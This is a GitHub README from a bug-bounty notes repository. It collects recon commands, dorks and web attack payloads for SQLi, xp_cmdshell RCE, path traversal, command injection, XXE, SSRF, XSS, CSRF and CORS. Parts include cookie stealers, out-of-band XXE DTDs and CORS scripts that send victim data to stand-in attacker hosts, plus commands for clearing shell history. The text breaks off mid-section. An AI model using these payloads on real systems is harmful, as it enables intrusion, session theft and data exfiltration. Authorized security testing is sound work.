8000 GitHub - bbhunty/easyg-1: Here I gather all the resources about hacking that I find interesting
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ easyg-1 Public
forked from seeu-inspace/easyg

Here I gather all the resources about hacking that I find interesting

License

GPL-3.0 license
0 stars 48 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

bbhunty/easyg-1

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

856 Commits
.github/ISSUE_TEMPLATE
.github/ISSUE_TEMPLATE
 
 
XSS all the things
XSS all the things
 
 
img
img
 
 
lists
lists
 
 
scripts
scripts
 
 
shells
shells
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
easyg.rb
easyg.rb
 
 

Repository files navigation

███████╗ █████╗ ███████╗██╗   ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗  ███████║███████╗ ╚████╔╝ ██║  ███╗
██╔══╝  ██╔══██║╚════██║  ╚██╔╝  ██║   ██║
███████╗██║  ██║███████║   ██║   ╚██████╔╝
╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)

License Open Source Love

EasyG started out as a script that I use to automate some information gathering tasks for my hacking process, you can find it here. Now it's more than that. Here I gather all the resources about hacking that I find interesting: notes, payloads, tools and more.

Index

Resources

Blogs

Reports

News

Useful tips

  • For RCE
    • Never upload a shell at first, you can be banned from a program. Just execute a whoami as a PoC, proceed with a shell if required/allowed.
  • For stored XSS
    • console.log() is better than alert(), it makes less noise especially for stored XSS.
  • For SQLi
    • Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
    • Don't use tautologies like OR 1=1, it can end up in a delete query or something dangerous. It's better to use AND SLEEP(5) or te'+'st.
  • For subdomain takeovers
    • use as a PoC an html page like:
      9a69e2677c39cdae365b49beeac8e059.html 
      <!-- PoC by seeu -->

Check-lists

Testing layers

  • Integrations
  • Application Libraries (usually JavaScript)
  • Application: Custom Code or COTS
  • Application Framework
  • Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
  • Open Ports and Services (Default creds on services, service level exploits)

Multiple targets

  • Run EasyG assetenum
  • Select the interesting targets
    • Pass the subdomains to Burp Suite
    • Open them in Firefox
  • Check for mobile/desktop applications
    • If there are any other non-web application, use Apkleak and Source2Url (even if OoS)

Single target

Content Discovery

Some tips

  • If the application is ASP.NET, search for Appsettings.json
  • Use recursion. If you encounter a 401 response, search with waybackmachine
  • Search for past reports in the same program

Check the tech of a target with

Tools

  • feroxbuster
    • feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403
  • dirsearch
    • dirsearch -l list.txt -x 404,500,501,502,503 -e *
    • dirsearch -u target.io -x 404,500,501,502,503 -e *
  • changedetection.io
  • ffuf

Crawling

  • gospider
    • gospider -s target -c 10 -d 4 -t 20 --sitemap --other-source -p http://localhost:8080 --cookie "0=1" --blacklist ".(svg|png|gif|ico|jpg|jpeg|bpm|mp3|mp4|ttf|woff|ttf2|woff2|eot|eot2|swf|swf2|css)"
  • hakrawler
    • cat target.txt | hakrawler -u -insecure -t 20 -proxy http://localhost:8080 -h "Cookie: 0=1"
  • Katana
    • katana -u target -jc -kf -aff -proxy http://127.0.0.1:8080" -H "Cookie: 0=1"

Wordlists

To find more endpoints

Google Dorking

  • ext: to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form,swf;
  • Search also for pdf, xlsx, bak and similar, they may contain some infos;
  • site: to target a website and its subdomains;
  • inurl:& to search for parameters;
  • intitle: to search interesting pages like admin, register, login etc.
  • "Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com [Reference]
  • intext:"© copyright COMPANY YEAR" [Reference]
  • site:target.com intext:login intext:username intext:password
  • Exposed .git intext:"index of /.git" "parent directory"
  • Search for s3 buckets site:.s3.amazonaws.com "COMPANY"
  • Find CVEs, like CVE-2019-9647 intext:"Powered by Gila CMS"
  • Errors site:target.com intext:"Warning: mysql_num_rows()"
  • intitle:"Index of /" + ".htaccess"
  • Google Dorks - Cloud Storage: 
    site:http://s3.amazonaws.com "target.com"
site:http://blob.core.windows.net "target.com"
site:http://googleapis.com "target.com"
site:http://drive.google.com "target.com"

GitHub Dorking

  • sensitive words: password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
  • languages: json, bash, shell, java etc., example HEROKU_API_KEY language:json
  • extensions: extensions: bat, config, ini, env etc.
  • filename: netrpc, .git-credentials, .history, .htpasswd, bash_history
  • Other dorks

Tools

For a temporary public server

For auths

To find parameters

Asset enumeration/discovery

  • amass
    • amass enum -brute -active -d target -o output/target.txt -v
  • subfinder
    • subfinder -d target -all -o output/target_subfinder.txt"
  • github-subdomains
  • nmap
    • Discover everything + services nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml
  • bgp.he.net to find ASN + amass intel -asn <ASN>
  • crt.sh
    • Crtsh-Fetcher
    • To find new domains cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
  • naabu
    • Discover everything faster naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt
    • naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt
  • gobuster + all.txt by jhaddix
  • dnsx
    • Reverse DNS lookup cat ip.txt | dnsx -ptr -resp-only
  • VhostScan to discover virtual hosts
  • gip a command-line tool and Rust library to check global IP address.
  • httprobe
    • type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt
  • anew to add only new subdomains
  • httpx
    • type scope.txt | httpx -sc -mc 404

Vulnerabilities

  • LinPEAS - Linux Privilege Escalation Awesome Script
  • BruteSpray python brutespray.py --file nmap.xml --threads 5 --hosts 5
  • nuclei
    • Automatic Selection nuclei -u http://target.io -as
    • Check for Technologies %USERPROFILE%\nuclei-templates\technologies
    • Check for more -t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
    • Use it in a workflow cat subdomains.txt | httpx | nuclei -t technologies
    • To use tags combined with automatic selection nuclei -l list.txt -as -tags log4j -o output.txt

For Reporting

Other

Burp suite

To add a domain + subdomains in advanced scopes: ^(.*\.)?test\.com$

To add a new header

1. Go to Proxy -> Options -> Match and Replace -> Add
2. Change Type to Request Header
3. As the default text says in Match 'leave blank to add a new header'
4. Put the new header in Replace

Cool extensions:

Browser extensions:

Network

ip route add <net_address_in_cdr> via <interface_gateway>
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows)
nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target

Resources

Linux

Linux Commands

netstat -tulpn                                        Show Linux network ports with process ID’s (PIDs)
watch ss -stplu                                       Watch TCP, UDP open ports in real time with socket summary.
lsof -i                                               Show established connections.
macchanger -m MACADDR INTR                            Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24                          Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24                        Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR                        Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500                                Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1                                    Dig reverse lookup on an IP address.
host 192.168.1.1                                      Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR                   Perform a DNS zone transfer using dig.
host -l domain.com nameserver                         Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x                                    Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0                  Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com                            Blocks access to google.com from the host machine.
echo \"1\" > /proc/sys/net/ipv4/ip_forward              Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
echo \"8.8.8.8\" > /etc/resolv.conf                     Use Google DNS.

Linux User Management

whoami                                                Shows currently logged in user on Linux.
id                                                    Shows currently logged in user and groups for the user.
last                                                  Shows last logged in users.
mount                                                 Show mounted drives.
df -h                                                 Shows disk usage in human readable output.
echo \"user:passwd\" | chpasswd                         Reset password in one line.
getent passwd                                         List users on Linux.
strings /usr/local/bin/blah                           Shows contents of none text files, e.g. whats in a binary.
uname -ar                                             Shows running kernel version.
PATH=$PATH:/my/new-path                               Add a new PATH, handy for local FS manipulation.
history                                               Show bash history, commands the user has entered previously.

Linux File Commands

df -h blah                                            Display size of file / dir Linux.
diff file1 file2                                      Compare / Show differences between two files on Linux.
md5sum file                                           Generate MD5SUM Linux.
md5sum -c blah.iso.md5                                Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah                                             Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix                                              Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file                     Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file                  Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file                            Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf                                                Remove files and directories without prompting for confirmation.

Misc Commands

init 6                                                Reboot Linux from the command line.
gcc -o output.c input.c                               Compile C code.
gcc -m32 -o output.c input.c                          Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE                                     Disable bash history logging.
rdesktop X.X.X.X                                      Connect to RDP server from Linux.
kill -9 $$                                            Kill current session.
chown user:group blah                                 Change owner of file or dir.
chown -R user:group blah                              Change owner of file or dir and all underlying files / dirs – recersive chown.
chmod 600 file                                        Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.
ssh user@X.X.X.X | cat /dev/null > ~/.bash_history    Clear bash history

Linux File System Permissions

777 rwxrwxrwx                                         No restriction, global WRX any user can do anything.
755 rwxr-xr-x                                         Owner has full access, others can read and execute the file.
700 rwx------                                         Owner has full access, no one else has access.
666 rw-rw-rw-                                         All users can read and write but not execute.
644 rw-r--r--                                         Owner can read and write, everyone else can read.
600 rw-------                                         Owner can read and write, everyone else has no access.

Linux Directories

/                                                     / also know as “slash” or the root.
/bin                                                  Common programs, shared by the system, the system administrator and the users.
/boot                                                 Boot files, boot loader (grub), kernels, vmlinuz
/dev                                                  Contains references to system devices, files with special properties.
/etc                                                  Important system config files.
/home                                                 Home directories for system users.
/lib                                                  Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found                                           Files that were saved during failures are here.
/mnt                                                  Standard mount point for external file systems.
/media                                                Mount point for external file systems (on some distros).
/net                                                  Standard mount point for entire remote file systems – nfs.
/opt                                                  Typically contains extra and third party software.
/proc                                                 A virtual file system containing information about system resources.
/root                                                 root users home dir.
/sbin                                                 Programs for use by the system and the system administrator.
/tmp                                                  Temporary space for use by the system, cleaned upon reboot.
/usr                                                  Programs, libraries, documentation etc. for all user-related programs.
/var                                                  Storage for all variable files and temporary files created by users, such as log files, mail queue,
                                                      print spooler. Web servers, Databases etc.

Linux Interesting Files / Directories

/etc/passwd                                           Contains local Linux users.
/etc/shadow                                           Contains local account password hashes.
/etc/group                                            Contains local account groups.
/etc/init.d/                                          Contains service init script – worth a look to see whats installed.
/etc/hostname                                         System hostname.
/etc/network/interfaces                               Network interfaces.
/etc/resolv.conf                                      System DNS servers.
/etc/profile                                          System environment variables.
~/.ssh/                                               SSH keys.
~/.bash_history                                       Users bash history log.
/var/log/                                             Linux system log files are typically stored here.
/var/adm/                                             UNIX system log files are typically stored here.
/var/log/apache2/access.log                           Apache access log file typical path.
/var/log/httpd/access.log                             Apache access log file typical path.
/etc/fstab                                            File system mounts.

Mobile

FlappyBird_structure.apk
├── AndroidManifest.xml meta-information about the app
├── META-INF/ a manifest of metadata information
├── classes.dex contains the Java libraries that the application uses
├── lib/ compiled native libraries used by the app
├── res/ It can store resource files such as pictures, XML files, etc.
├── assets/ application assets
└── resources.arsc contains compiled resources in a binary format

Data storage search for PII unencrypted in

  • Phone system logs
  • Webkit cache
  • Dbs, plists, etc.
  • Hardcoded in the binary

Resources

Android tools

  • m.apkpure.com Download APKs
  • apps.evozi.com Download APKs
  • apk-dl.com Download APKs
  • adb it is used to debug an android device
  • HTTP Toolkit to see requests on a non-rooted or emulated device
  • Genymotion an android emulator
  • Android Studio Android application development, useful also for the emulator
    • Note: to start only the emulator, use commands such as 
      cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator
emulator -avd Pixel_4_XL_API_30
  • Java Decompiler
  • dex2jar decompile an .apk into .jar
  • jadx-gui another tool for producing Java source code from Android Dex and Apk files
  • apktool to unpack an apk

Source code review

  • Search for known dangerous functions used on user-supplied input
    • example, eval( can cause command injection without proper sanitization
  • Search for hardcoded credentials such as API keys, encryption keys and database passwords
  • Search for weak cryptography or hashing algorithms
  • Search for outdated dependencies
  • Search for revealing comments

Digging deeeper

  • Prioritize functions like authentication, autorization, PII etc.
  • Follow any code that deals with user input

Automation

  • Use SAST tools
  • Use SCA tools
  • Use secret scanners
  • Then test the results manually

Resources

Web vulnerabilities

SQL injection

Tools

sqlmap

 > SQLMap: sqlmap -u https://vulnerable/index.php?id=1
                  --tables (to see db)
                  -D DATABASE_NAME -T TABLE_NAME --dump (to see data)
                  --forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl)
		  -l (to parse a Burp log file)
		  --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3		  
		  --force-ssl --threads 5 --level 1 --risk 1 --tamper=space2comment

Some payloads

  • 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
  • 0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
  • 0'or(now()=sysdate()&&SLEEP(1))or'Z

RCE

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';
EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';

Authentication vulnerabilities

  • Multi-factor authentication
    • Response manipulation, try to intercept the response and modify the status to 200
    • Status code manipulation, change the code from 4xx to 200
    • 2FA code leakage in the response
    • JS File Analysis
    • 2FA Code Reusability
    • Lack of Bruteforce protection
    • The 2FA code can be used for any user
    • CSRF on 2FA disabling
    • Password reset disable 2FA
    • Bypass 2FA with null or 000000
    • Access the content directly
    • Login with Oauth to bypass 2FA
    • If you get logged-out after failed attempts, use macros with Burp
  • Password reset
    • Change the Host with the host of your server. The request for a password reset might use the Host value for the link with the reset token
    • Try with headers like X-Forwarded-Host:
    • Via dangling markup
      • Host: victim.com:'<a href="//attacker.com/?
    • Insert two emails, like:
      • email1@service.com;email2@service.com
      • email:["email1@service.com","email2@service.com"]
  • Password change
  • Keeping users logged in
  • Rate-limit
  • Test remember me functionality
  • Web Cache Deception
    • Attacker send to a victim a 404 endpoint like site.com/dir/ok.css
    • Victim click on it, the CDN cache the page
    • Attacker goes to site.com/dir/ok.css, now it can see the page of the Victim
  • PHP protections can be bypassed with [], like password=123 to password[]=123
  • Replace password with a list of candidates, example 
    "username":"usertest"
"password":[
 "123456",
 "password",
 "qwerty",
 ...
  • Search for Open Redirect in login and register

Directory Traversal

  • simple case https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
  • absolute path https://insecure-website.com/loadImage?filename=/etc/passwd
  • stripped non-recursively https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
  • superfluous URL-decode https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png

OS Command Injection

Let's say that the vulnerable endpoint it's https://insecure-website.com/stockStatus?productID=381&storeID=29. The provide the stock information, the application runs the command stockpile.pl 381 29. If there is no OS Command Injection protection, by inserting the payload & echo abcdefg & in productID it's possible to execute the command echo.

For blind OS Command Injections

  • Time delay & ping -c 10 127.0.0.1 &
  • Redirecting output & whoami > /var/www/static/whoami.txt &
  • Out-of-band (OAST) techniques & nslookup kgji2ohoyw.web-attacker.com &

Ways of injecting OS commands

  • Both Windows and Unix-based systems
    • &
    • &&
    • |
    • ||
  • Unix-based systems only
    • ;
    • Newline with 0x0a or \n
    • injected command
    • $(injected command)

Resource

Business logic vulnerabilities

Examples

  • Excessive trust in client-side controls
  • 2FA broken logic
  • Failing to handle unconventional input
  • Inconsistent security controls
  • Weak isolation on dual-use endpoint
  • Password reset broken logic
  • Insufficient workflow validation
  • Flawed enforcement of business rules
  • Authentication bypass via encryption oracle

Information Disclosure

What is information disclosure?

  • Data about other users, such as usernames or financial information
  • Sensitive commercial or business data
  • Technical details about the website and its infrastructure

What are some examples of information disclosure?

  • Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
  • Providing access to source code files via temporary backups
  • Explicitly mentioning database table or column names in error messages
  • Unnecessarily exposing highly sensitive information, such as credit card details
  • Hard-coding API keys, IP addresses, database credentials, and so on in the source code
  • Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
  • If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [Reference]

How do information disclosure vulnerabilities arise?

  • Failure to remove internal content from public content
  • Insecure configuration of the website and related technologies
  • Flawed design and behavior of the application

Access control vulnerabilities and privilege escalation

In the context of web applications, access control is dependent on authentication and session management:

  • Authentication identifies the user and confirms that they are who they say they are;
  • Session management identifies which subsequent HTTP requests are being made by that same user;
  • Access control determines whether the user is allowed to carry out the action that they are attempting to perform.

From a user perspective, access controls can be divided into the following categories:

  • Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
  • Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
  • Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it

Tools

File upload vulnerabilities

Upload Functions check-list

  • Check if the method PUT is enabled
  • Integrations (from 3rd party)
    • XSS
  • Self Uploads
    • XML based (Docs/PDF)
      • SSRF, XSS
    • Image
      • XSS, Shell
        • Name
        • Binary header
        • Metadata
  • Where is data stored?

Extension Splitting

  • shell.php%00.png
  • shell.php%0A.png
  • shell.php\n.png
  • shell.php\u000a.png
  • shell.php\u560a.png
  • shell.php%E5%98%8A.png
  • shell.php;.png
  • shell.php%3B.png
  • shell.php\u003b.png
  • shell.php\u563b.png
  • shell.php%E5%98%BB.png

multipart/form-data POST request

POST / HTTP/2
Host: example.io
Content-Type: multipart/form-data; boundary=---------------------------374598703146120535182333328
Content-Length: 342

-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="key"

general
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="file"; filename="file.pdf"
Content-Type: application/pdf

$content$
-----------------------------374598703146120535182333328--

Resources

Server-side request forgery (SSRF)

SSRF with blacklist-based input filters bypass Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1;
  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose or the domain firefox.fr is a DNS that point to 127.0.0.1.;
  • Obfuscating blocked strings using URL encoding or case variation.

SSRF with whitelist-based input filters bypass

  • You can embed credentials in a URL before the hostname, using the @ character. For example: https://expected-host@evil-host.
  • You can use the # character to indicate a URL fragment. For example: https://evil-host#expected-host.
  • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host.
  • You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
  • You can use combinations of these techniques together.

Other tips

  • By combining it with an Open redirection, you can bypass some restrictions. An example: http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
  • For AWS, bypass some restrictions by hosting this PHP page [Reference] 
    <?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>
  • If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
  • SSRF (Server Side Request Forgery) testing resources

Common endpoints

  • Webhooks
    • Try to send requests to internal resources
  • PDF Generator
    • If there is an HTML Injection in a PDF generator, try call internal resources with something like <iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">, with these tags <img>, <script>, <base> or with the CSS element url()
  • Document parsers
    • If it's an XML doc, use the PDF Generator approach
    • In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
  • Link expansion, [Reference]
  • File uploads
    • Instead of uploading a file, upload a URL. An example
    • Use an SVG file 
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
	<image xlink:href="https://example.com/test.png"/>
</svg>

Open redirection

Bypasses

XXE injection

  • Exploiting XXE to retrieve files
    Original 
    <?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
    Modified 
    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
  • Exploiting XXE to perform SSRF attacks 
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>
  • Exploiting blind XXE exfiltrate data out-of-band
    Example 
    <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>
  • Exfiltrate data out-of-band
    for-the-malicious-web-server.dtd 
    <!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://webattacker.com/?x=%file;'>">
%eval;
%exfil;
    Submit to vulnerable server 
    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>
  • Exploiting blind XXE to retrieve data via error messages 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
  • Exploiting blind XXE by repurposing a local DTD
    Suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd 
    <!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
    To locate the DTD file, submit the payload 
    <!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM
"file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
  • Try with xinclude to achieve SSRF or LFI 
    <?xml version="1.0" encoding="utf-8" ?>
<username xmls:xi="https://w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///c:/windows/win.ini">
</username>

Attack surfaces

  • XInclude attacks 
    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
  • XXE attacks via file upload with .svg 
    <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITYxxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
 <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
  • XXE attacks via modified content type
    For example, Content-Type: application/x-www-form-urlencoded -> Content-Type: text/xml

Manually testing for XXE vulnerabilities generally involves

  • Testing for file retrieval
  • Testing for blind XXE vulnerabilities
  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document

Cross-site scripting (XSS)

Resources

CSP

Swagger XSS

Blind XSS

  • Insert a payload in the User-Agent, try with the match/replace rule
  • Other endpoints: pending review comments, feedback

Bypasses

Carriage Return Line Feed (CRLF) injection

  • /%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • /%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • Nuclei template %USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml

Cross Site Tracing

  • If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. [Reference]

Payloads

  • HTML injection 
    <p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
  • For hidden inputs: accesskey="X" then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
  • For mobile applications: try to use as a vector the name of the phone with a payload like "/><script>alert(1)</script>
  • iframe + base64 encoded SVG 
    <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
  • Cookie stealers 
    • fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});
    • document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')
    • <img src=x onerror=this.src='http://ATTACKER-WEBSITE/?x='+document.cookie;>
  • %22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
  • 1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1
  • <svg/ class="pl-kos">>
  • Unusual events
    • onpointerrawupdate (Chrome only)
    • onmouseleave
  • This lead the page to make a loop of requests, eventually causing being blocked by a WAF and being a potential DoS 
    for(;;){fetch('https://VICTIM/',{method:'GET'});}
  • Double encoding 
    %253c%252fscript%253e%253cscript%253ealert(document.cookie)%253c%252fscript%253e
  • Small SVG base64 
    data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxyZWN0IHdpZHRoPSIxIiBoZWlnaHQ9IjEiLz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+
  • jAvAsCrIpT 
    <a href="jAvAsCrIpT:alert(1)">payload</a>

Cross-site request forgery (CSRF)

  • Remove the entire token
  • Use any random but same-length token, or same-length+1/same-length-1
  • Use another user's token
  • Change from POST to GET and delete the token
  • If it's a PUT or DELETE request, try POST /profile/update?_method=PUT or 
    POST /profile/update HTTP/1.1
Host: vuln.com
...

_method=PUT
  • If the token it's in a custom header, delete the header
  • Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/html, application/xml
  • If there is double submit token, try CRLF injection
  • Bypassing referrer check
    • If it's checked but only when it exists, add to the PoC <meta name="referrer" content="never">
    • Regex Referral bypass 
      - https://attacker.com?victim.com
- https://attacker.com;victim.com
- https://attacker.com/victim.com/../victimPATH
- https://victim.com.attacker.com
- https://attackervictim.com
- https://victim.com@attacker.com
- https://attacker.com#victim.com
- https://attacker.com\.victim.com
- https://attacker.com/.victim.com
  • CSRF token stealing via XSS/HTMLi/CORS
  • JSON based
    • Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data
    • Use flash + 307 redirect
  • Guessable CSRF token
  • Clickjacking to strong CSRF token bypass
  • Type juggling
  • Use array, from csrf=token to csrf[]=token
  • Set the CSRF token to null or add null bytes
  • Check whether CSRF token is sent over http or sent to 3rd party
  • Generate multiple CSRF tokens, pick the static part. Play with the dynamic part

Resources

Cross-origin resource sharing (CORS)

Classic CORS vulnerability

<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','$url/accountDetails',true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
  location='/log?key='+this.responseText;
  };
</script>

CORS vulnerability with null origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
  var req = new XMLHttpRequest();
  req.>
  req.open('get','vulnerable-website.com/sensitive-victim-data',true);
  req.withCredentials = true;
  req.send();
     
  function reqListener() {
  location='malicious-website.com/log?key='+this.responseText;
  };</script>">
</iframe>

CORS vulnerability with trusted insecure protocols

<script>
